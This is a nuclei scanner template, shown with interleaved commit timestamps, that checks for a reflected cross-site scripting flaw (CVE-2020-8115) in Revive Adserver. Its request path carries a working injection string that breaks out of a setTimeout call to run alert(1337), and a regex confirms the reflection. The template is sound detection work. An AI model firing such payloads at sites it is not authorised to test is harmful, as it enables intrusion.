nuclei-templates/cves/2020/CVE-2020-8115.yaml

20 lines
456 B
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8115
2020-04-08 11:27:13 +00:00
info:
name: Revive Adserver XSS
author: madrobot & dwisiswant0
2020-05-25 07:49:06 +00:00
severity: medium
2020-04-08 11:27:13 +00:00
requests:
- method: GET
path:
2020-04-09 13:02:30 +00:00
- "{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""
matchers-condition: and
2020-04-08 11:27:13 +00:00
matchers:
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200
- type: regex
2020-04-08 11:27:13 +00:00
part: body
regex:
- (?mi)window\.location\.replace\(".*alert\(1337\)